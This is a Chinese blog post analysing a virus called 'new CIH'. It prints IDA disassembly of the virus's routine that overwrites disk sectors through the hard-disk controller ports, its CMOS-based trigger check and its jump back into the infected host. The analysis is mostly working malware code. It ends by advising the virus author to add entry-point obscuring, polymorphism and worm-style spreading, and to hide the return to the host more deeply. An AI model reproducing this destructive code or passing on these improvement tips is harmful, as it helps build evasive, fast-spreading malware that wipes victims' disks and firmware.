信息来源:haiwei's blog
前一段时间出了一个叫"新CIH" 病毒,简单的看了一下,
下面是该病毒的IDA代码:
1. 大部分跟原来的CIH一样,进Ring0(很不稳定的说),刷Bios,写硬盘.感染EXE并不增加文件大小,
写硬盘代码(风般的文章里其实已经写得很详细了)
.text:00417E7C AccessDisk proc near ; CODE XREF: .text:00417A65�p
.text:00417E7C ; .text:00417A79�p ...
.text:00417E7C 51 push ecx
.text:00417E7D 6A 04 push 4
.text:00417E7F 59 pop ecx
.text:00417E80
.text:00417E80 loc_417E80: ; CODE XREF: AccessDisk+19�j
.text:00417E80 3C 41 cmp al, 41h
.text:00417E82 72 0E jb short loc_417E92
.text:00417E84 90 nop
.text:00417E85 90 nop
.text:00417E86 90 nop
.text:00417E87 90 nop
.text:00417E88 3C 5A cmp al, 5Ah
.text:00417E8A 77 06 ja short loc_417E92
.text:00417E8C 90 nop
.text:00417E8D 90 nop
.text:00417E8E 90 nop
.text:00417E8F 90 nop
.text:00417E90 04 20 add al, 20h
.text:00417E92
.text:00417E92 loc_417E92: ; CODE XREF: AccessDisk+6�j
.text:00417E92 ; AccessDisk+E�j
.text:00417E92 C1 C8 08 ror eax, 8
.text:00417E95 E2 E9 loop loc_417E80
.text:00417E97 59 pop ecx
.text:00417E98 C3 retn
.text:00417E98 AccessDisk endp
.text:00417E98
.text:00417E99 ; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪?
.text:00417E99 66 BA F6 01 mov dx, 1F6h
.text:00417E9D B0 A0 mov al, 0A0h
.text:00417E9F EE out dx, al ; AT hard disk controller:
.text:00417E9F ; Drive & Head.
.text:00417E9F ; Read/Write: bits indicate head, drive for operation
.text:00417EA0
.text:00417EA0 loc_417EA0: ; CODE XREF: .text:00417EC8�j
.text:00417EA0 FF 85 3B F7 FF FF inc dword ptr [ebp-8C5h]
.text:00417EA6 8A 85 3B F7 FF FF mov al, [ebp-8C5h]
.text:00417EAC 3C 3F cmp al, 3Fh
.text:00417EAE 74 0A jz short loc_417EBA
.text:00417EB0 90 nop
.text:00417EB1 90 nop
.text:00417EB2 90 nop
.text:00417EB3 90 nop
.text:00417EB4 75 14 jnz short loc_417ECA
.text:00417EB6 90 nop
.text:00417EB7 90 nop
.text:00417EB8 90 nop
.text:00417EB9 90 nop
.text:00417EBA
.text:00417EBA loc_417EBA: ; CODE XREF: .text:00417EAE�j
.text:00417EBA 33 C0 xor eax, eax
.text:00417EBC 89 85 3B F7 FF FF mov [ebp-8C5h], eax
.text:00417EC2 FF 85 3F F7 FF FF inc dword ptr [ebp-8C1h]
.text:00417EC8 EB D6 jmp short loc_417EA0
.text:00417ECA ; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪?
.text:00417ECA
.text:00417ECA loc_417ECA: ; CODE XREF: .text:00417EB4�j
.text:00417ECA 66 BA F2 01 mov dx, 1F2h
.text:00417ECE EE out dx, al ; AT hard disk controller:
.text:00417ECE ; Sector count.
.text:00417ECE ; Read/Write count of sectors for operation
.text:00417ECF 66 BA F3 01 mov dx, 1F3h
.text:00417ED3 8A 85 3F F7 FF FF mov al, [ebp-8C1h]
.text:00417ED9 EE out dx, al ; AT hard disk controller:
.text:00417ED9 ; Sector number.
.text:00417ED9 ; Read/Write current/starting logical sector number
.text:00417EDA 66 BA F4 01 mov dx, 1F4h
.text:00417EDE 32 C0 xor al, al
.text:00417EE0 EE out dx, al ; AT hard disk controller:
.text:00417EE0 ; Cylinder high (bits 0-1 are bits 8-9 of 10-bit cylinder number)
.text:00417EE1 66 BA F5 01 mov dx, 1F5h
.text:00417EE5 32 C0 xor al, al
.text:00417EE7 EE out dx, al ; AT hard disk controller:
.text:00417EE7 ; Cylinder low (bits 0-7 of 10-bit cylinder number)
.text:00417EE8 66 BA F7 01 mov dx, 1F7h
.text:00417EEC B0 30 mov al, 30h
.text:00417EEE EE out dx, al ; AT hard disk
.text:00417EEE ; command register:
.text:00417EEE ; 1?H = Restore to cylinder 0
.text:00417EEE ; 7?H = Seek to cylinder
.text:00417EEE ; 2?H = Read sector
.text:00417EEE ; 3xH = Write sector
.text:00417EEE ; 50H = Format track
.text:00417EEE ; 4xH = verify read
.text:00417EEE ; 90H = diagnose
.text:00417EEE ; 91H = set parameters for drive
.text:00417EEF
.text:00417EEF loc_417EEF: ; CODE XREF: .text:00417EF2�j
.text:00417EEF EC in al, dx ; AT hard disk
.text:00417EEF ; status register bits:
.text:00417EEF ; 0: 1=prev cmd error
.text:00417EEF ; 2: Corrected data
.text:00417EEF ; 3: Data Request. Buffer is busy
.text:00417EEF ; 4: Seek completed
.text:00417EEF ; 5: Write fault
.text:00417EEF ; 6: Drive ready (unless bit 4=0)
.text:00417EEF ; 7: Busy
.text:00417EF0 A8 08 test al, 8
.text:00417EF2 74 FB jz short loc_417EEF
.text:00417EF4 66 B8 C8 00 mov ax, 0C8h
.text:00417EF8
.text:00417EF8 loc_417EF8: ; CODE XREF: .text:00417F11�j
.text:00417EF8 66 B9 0C 00 mov cx, 0Ch
.text:00417EFC 66 8D B5 2D F7 FF+ lea si, [ebp-8D3h]
.text:00417F03 66 BA F0 01 mov dx, 1F0h
.text:00417F07 FA cli
.text:00417F08 F3 66 6F rep outsw
.text:00417F0B FB sti
.text:00417F0C 66 48 dec ax
.text:00417F0E 66 85 C0 test ax, ax
.text:00417F11 74 E5 jz short loc_417EF8
.text:00417F13 33 C0 xor eax, eax
.text:00417F15 50 push eax
.text:00417F16 FF 95 ED F8 FF FF call dword ptr [ebp-713h]
.text:00417F16 ; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪
2.发作条件(从下面的代码来看,发作条件是很难形成的,可能作者的原来意思是要取Cmos时间来作比较,但参数传错了,再或者作者是故意写成这样的)
loc_417D9F: ; CODE XREF: .text:00417B8C�j
.text:00417D9F ; .text:00417D86�j ...
.text:00417D9F 66 B8 16 10 mov ax, 1016h
.text:00417DA3 E6 70 out 70h, al ; CMOS Memory:
.text:00417DA3 ; Base memory size
.text:00417DA5 E4 71 in al, 71h ; CMOS Memory
.text:00417DA7 86 E0 xchg ah, al
.text:00417DA9 E6 70 out 70h, al ; CMOS Memory:
.text:00417DA9 ; used by real-time clock
.text:00417DAB E4 71 in al, 71h ; CMOS Memory
.text:00417DAD 66 35 26 09 xor ax, 926h
.text:00417DB1 0F 85 9A 00 00 00 jnz loc_417E51
.text:00417DB7 9C pushf
.text:00417DB8 60 pusha
.text:00417DB9 8B F5 mov esi, ebp
.text:00417DBB BF 4C 38 00 80 mov edi, 8000384Ch
.text:00417DC0 66 BD F8 0C mov bp, 0CF8h
.text:00417DC4 66 BA FE 0C mov dx, 0CFEh
3.给作者提点建议:)
a. 来点EPO吧, 不然也太光溜溜了
b. 来点简单变形, (太复杂的变形就算了, 分析起来累啊^_^)
c. 能不能不要破坏那部分呀,即使要也来点温柔点的呀
d. 结合一个蠕虫的思想,让他传播范围大点
e. 返回原宿主的代码再藏深点
text:00417657 loc_417657: ; CODE XREF: start+1B�j
.text:00417657 ; start+56�j ...
.text:00417657 81 ED A8 77 01 00 sub ebp, 177A8h
.text:0041765D 81 C5 62 F6 00 00 add ebp, 0F662h 原宿主入口, 太明显了
.text:00417663 55 push ebp
.text:00417664 C3 retn
